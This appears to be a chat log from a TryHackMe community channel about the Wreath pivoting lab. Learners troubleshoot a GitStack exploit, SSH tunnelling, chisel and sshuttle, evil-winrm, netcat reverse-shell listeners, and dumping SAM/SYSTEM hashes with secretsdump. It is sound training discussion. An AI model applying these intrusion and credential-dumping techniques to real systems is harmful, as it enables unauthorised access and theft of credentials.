Found existing installation: requests 2.25.1
Not uninstalling requests at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'requests'. No files were found to uninstall.
I have also done the dos2unix
That's a python exploit, not a PHP exploit
It's not uploading the entire file to the server either -- just the bit at the bottom
And you're essentially doing what it already does, just by GET rather than POST
That's a Python2 thing. Easy solution is to use the Python3 port I made. It's pinned in here.
Failing that, try installing requests for python2 specifically
what part of the bit at the bottom?
I would suggest reading the code, but the last few lines where it's got the hardcoded PHP exploit code
You're already told to modify it
anyone can help me to SSH Tunnelling / Port Forwarding
channel 0: chan_write_failed for ostate 3
connect_to 10.200.83.200 port 443: failed.
channel 1: chan_write_failed for ostate 3
connect_to 10.200.83.200 port 443: failed.
channel 4: chan_write_failed for ostate 3
i just followed the step and get this error
I am at task 18 (git server pivoting). It is advised to use sshuttle. If I use other tools would it cause problems?
ok I'm getting an XFreeRDp window if I use /sec:tls but getting this error now...
my user is in the correct groups
That's Remote Management Users
You need Remote Desktop Users for RDP
Or just Administrators
i've definitely added the users to the right groups as per guide:
ill try adding it to remote desktop users
@merry robin when are the competition winners being announced and when can we read the reports?
I accepted the reports yesterday @tranquil river, so you can read them whenever. The winners are, well:
I'm waiting to speak to the last runner up, but the winners are chosen and have all been spoken to
Ooh exciting! I never finished it as I don't have my own PC so couldn't use a local VM
Thank you for letting me know!
Gave +1 Rep to @merry robin
I'm just trying to give people rep points
you don't seem to have Administrators in your screenshot
yep i got it now, sorry all!
no worries
Btw @merry robin congratulations on wreath, an amazing network, must have taken you so long to build the boxes, then write the content! It's such a fun room.
need to finish that tonight...then write the report :/
i am not able to scan the given target IP
with nmap
can anyone can help me with that ?
are you sure you're connected to the Wreath Network?
on the network configuration where we download our vpn connection profiles?
Hi i have a query on task 20. Can someone help
try sudo nmap -sV -sC -O [ip]
I have found the exploit for gitstack but it's written in python2, and when i run the exploit it shows error no module named requests
I have installed it already
Module requests
Changing the default python interpreter from python3 to python2 didn't help
add a -Pn to remove pinging @crisp fjord
does the hint work? (the image u sent)
nope
my vpn connect as well
problem is somewhere else
i think someone messed up this network
i can't even open that network ip on my browser !
vote for reset
already did
or try nmap [IP] -Pn
maybe vote for the reset
.
on which task are you
task 5
Bro I am getting the ports
nope 87.200
commands are right, wait for the network reset or delete the current connection pack and generate new and then try
ohk
you will get different network
that's ok but someone here to solve my query
you got the same then you have to wait for your connection pack to get expired or wait for network reset
Hey! I'm currently preoccupied. My current recommendation would be to check out the videos attached to each task if this is related to room questions. Regarding other items, please email support@tryhackme.com :)
Anyone having issues with this room?
Can't seem to get a shell now when I have done before
Don't ask to ask, just ask the question and if someone can help, they will π
Give more detail. Which task are you on, etc.
any other error message?
no
screenshot it maybe? Which task are you on? Is this before the chisel and sshuttle pieces?
side note: might want to get out of the habit of running everything as root :). Not the issue, just mentioning it
so you HAD a shell before, and you lost it?
I know, but I just use it for try hack me so no biggie really
yeah, exactly
was it because of a network timeout? Network reset? Or something else?
nope
So you're on task 6, correct? Webserver exploitation?
Things I'd check: Are you connected to the vpn? Is the network up? (sometimes a page refresh shows more accurate data on that) Can you ping the .200 machine?
If the IP of your network changed or your vpn config changed, make sure that you've updated your /etc/hosts file
my retry after creating the directory
ok well now it looks like you fixed one error you just have to fix the cause of 'not a git repository'
which, would lead me to think you don't have a git repository?
i made a .git
like instructions said
hmmm
i dunno that doesn't look like what I did
i think i should watch dark's video
oh hi @safe meteor
Hello, I get a problem in task 6 reverse exploitation when I run #nc -lvnp 1234, there is nothing
you did it all on evilwinrm?
I copied the git repository with it
ye i did as well
which took a while, then I extracted the website.git (didn't move it)
downloaded the website.git
I just used git clone Website.git instead of mucking about with GitTools, but those tools can be useful in other places
if you downloaded it how does c:\GitStack\repositiories\Website.git work as anything
shouldn't it be in a folder on ur kali
press enter on the exploit
enter
then you will get a shell
it tells you to do so when you type the shell command and enter the host ip and port
ok good it works, thank you
Gave +1 Rep to @tawny fulcrum
it is
it is a folder on my kali
just renamed it to .git
hmm, can evil-winrm launch a script on spawn?
I want to write a script to set up my proxy, but it looks like I'll need to do it manually π¦
I don't think so, but you could write a powershell script to just activate as soon as you get into the server
There are actually powershell chisel ports, so you could do it entirely from memory too
Hey, so I am working on the Git server, however I cannot connect. It isn't pinging or resolving, I have tried on my machine and on prod, could it be down?
yeah powershell doesn't seem to have access to the upload function though
oh well, close enough
oh...cat and a pipe seems to work
almost
wait no it works. I'm just an idiot
forgot the server part on the chisel
cat setup-proxy.ps1 | proxychains evil-winrm ...
it's a godugly hack but...
If it's a hack but it works, it's not a hack™
well I think I got the script to proxy back to the personal PC on a fresh network working
and I should be going to bed now
already posted the question
I have the same problem
I think u should install the git once again and use git clone command
Hi,
There is a bug for the Task 6 Webserver Exploitation on this question What is the root user's password hash?.
The root user's password hash on the machine is incorrect.
Indeed, I rewrite by hand the one in the @oblique crag 's video (https://www.youtube.com/watch?v=hu4d6nexAog&list=PLsqUCyw0Jf9sMYXly0uuwfKMu34roGNwk&index=3) and they are different.
The one in the video is correct when the one on the machine is not.
Any <@&568449888682246145> could make the change to match the hash on the machine and maybe put the last password on root in order to match the DarkSec video ?
PM open if needed.
@merry robin might be best for this :)
Ok
@night mango Disconnect from the VPN and DM me your config pack please π
(sorry for the ping so... but seems the one who could help me)
Root pass in 82 should now be fixed π
Ah did someone change it?
git clone
?
i never used git clone
was i supposed to?
i think you have the key to my issue
well the walkthrough wants you to learn about GitTools
but git clone works as well
big brain
right then, now to bonk that last server
so how do i use git clone in this situation
git clone Website.git?
im kinda slow i apologise
that should work
whoo rev shell script up
really should add the -q to proxychains though, it's very chatty
Then how are you meant to debug?
Just do it with mono
yeah.../me sighs
oh...darn
still shows as running though
ah there it goes...
Everything went boom
Mono scares me
I am unable to do anything to see if the Git Server is running, trying to ping from Prod and my local machine, vpn connected, unsure how to progress.
I am at that task too
Rename the Website repository to .git
Yeah them the hard part
You should pick ports above 15000
And dont forget to use the right name for applications etc you upload
"socat-bushidosan"
Instead of just socat
Or for the PHP listeners
Hey! I cannot run evil-winrm. I dont know ruby as much. Here's the output when executing the command:
<internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- rexml/document (LoadError)
from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/response_handler.rb:15:in `<top (required)>'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport.rb:16:in `require_relative'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport.rb:16:in `<top (required)>'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport_factory.rb:15:in `require_relative'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport_factory.rb:15:in `<top (required)>'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/connection.rb:16:in `require_relative'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/connection.rb:16:in `<top (required)>'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm.rb:17:in `require_relative'
from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm.rb:17:in `<top (required)>'
from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:160:in `require'
from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:160:in `rescue in require'
from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:149:in `require'
from ./evil-winrm.rb:8:in `<main>'
<internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- winrm (LoadError)
from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
from ./evil-winrm.rb:8:in `<main>'
nvm had to install rexml. It's working now
Nice debugging!
I guess apt did it automatically
i did brother
did you fix it? if yes, how?
im so dumb 
got it fixed
You gave the directory a name instead of only .git ?
any fixes?
i dont remember how i fixed it
but it was a really dumb mistake
any fixes for this tho?
ahh yeah I am at 42 xD
had to use secretsdump to get the hashes
Sure will do!
Dark has btw a complete walkthrough if you're stuck
You can watch the first part to get a hint xD
watched it, didnt help much
Not sure why didn't you get them via the mimikatz suggested. Perhaps try running file on both the sam.bak and system.bak files to check which type they actually are
??? what task you on brother
however, if I remember correctly, when I did that somewhere else with those both files, they were just named SYSTEM and SAM
u cant get mimikatz on the last one
ahh, sorry
you gotta use secretsdump
I thought you were on the git machine lol
its fine
lol
but yeah, try perhaps checking the file for validation
or renaming them to SYSTEM and SAM
capital?
yep, without the .bak
when you look the error up it says its a python error
I think the LOCAL parameter might be missing something
https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py LOCAL shows as a parameter of an argument called target, so perhaps try either target=LOCAL or target LOCAL, or remove LOCAL?
the .bak was used to get the files out of the machine I think
but to dump the file it needs to have no extension
mh, I have no idea
you could try downgrading the Impacket to a standard release and not a dev release
latest according to github seems to be 0.9.22, you have dev 0.9.23
hi! my network got reset and now I'm having issues with ssh connection to Webserver
It seems to be related to the fact that webserver does not have its public key in authorized_keys
As a result, I cannot use private key from the server for ssh connection. I also cannot edit authorized_keys
Is such situation possible or I'm missing something?
Do you have either of the files open in the background? close them and try rerunning the script
which files?
the sam or system
and what do you mean by open?
I think the network is stopped at this moment, could that be it?
Like open in the text editor. I see something in the background of your terminal, but not sure if those are those files or something else
ah thats the php webshell
ahh haha
no, it's definitely running
I will add printscreens to explain the issue better (after I figure out how discord works)
Perhaps they limited the amount of people who have access to the same spawn of the network. For me it shows as stopped. Remember to reload the page of the Wreath room to check the status
You could try it with a program called samdump2 if the impacket didn't work
ok
are you sure we are using the same net? for me webserver is 10.200.89.200
Ahh, perhaps not. For me it is 10.200.111.200, although last week it was at 10.200.80.200
you could try logging with the SSH keys through a different port, but if the public key got deleted perhaps the network might need to reset
There should be about 8-10 people to a network I'd guess
they also changed some things. When I first joined the network, it had up to 8 votes for reset. Then 4. Now it's at 2
Oops
Oh?
Was 8 on my instance last night afaik
Might be related to number of people on the server
Probably that's related to the number of people currently on that subnet. You get kicked off after 10 days
Ahh, I see. I thought you got kicked out of the room and had to rejoin, but that makes sense. Thanks
Congrats!
Grats
Well done! A great achievement
I never finished Wreath because I use AttackBox, but it taught me so much about pivoting, which I think is the most valuable lesson I got from it as I'd never done that before.
huzzah
nice :D
now for the hard part.
finding a way to generate a PDF
dang I didn't timestamp my exploits
timeline will be hard
oh Joplin keeps timestamps, ok so I have approximate times then
Hey @merry robin, sorry for the ping but for like the past 3 days, i haven't been able to at all access the Git Server on Wreath, I have tried in my browser as well as pinging it from the Production Server and my computer.
Do you have a proxy set up to access it?
@stoic flicker do you have any preferences over obsidian? if so, what are they? just wondering :D
No, I presume I need one.
Ah, thanks.
Oof, I have an issue with the command and control part. I wanted to try it with Metasploit by using the reverse_hop_http to get a session on the git server by using the web server as a hop but it doesn't work
The handler gets set up and I can see that the php server receives the request, but after running the payload on the git server I only see a request on the php server and nothing else happens in Metasploit
Hey! So i am unable to ping the prod server, i had closed my pc earlier and it will no longer allow me to ping, i restarted my OpenVPN connection. and nothing works
Muiri, you're mean making me open Word for the first time ever on this PC...
but whatever I made a logo thing
ok it's late, naptime
wait what
why can I remove attachments?
huh?
it pops up the prompt but doesnt do anything
Re: Task 20, final step of creating a reverse shell, I get a connection back but just a blinking cursor that does not respond to commands. We are talking to a Windows machine, correct? I even repeated executing the 43777.py exploit which confirmed an NT Authority shell. When I opened up port 15500 in the Firewall from .200 it responded to the command with 'success'. btw, using the url-encoder website, I selected encode to Windows CRLF AND unix LF on 2nd attempt, with same result. Which encoding is the correct one? I have screen shots of my other processes running available- did not want to clutter the feed;)
Listening on .200
I didn't go the sshuttle way, but why are you doing .150/24? as far as I know, /24 could be used after a .0 to check for the whole subnet segment
other than that, I had to first do a manual -d "a= ANY COMMAND" before the payload would work for me, but I didn't POST it to the server IP address, rather to the forward port I had established towards my local machine
Dark has some awesome walkthroughs you can use it to give yourself a small hint
@runic marsh re: .150/24 -iirc, I was just following directions per the room. and it confirmed the connection with "c: connected to server" so I thought I was good to go. Alternatively, it gave another way using the -N flag to auto select the subnet. I will try that next. I was able to curl single commands at .150 no problem- maybe I should set up a new user account that way- lol.
@safe meteor thanks I have been reviewing the write-ups. I will check out Dark.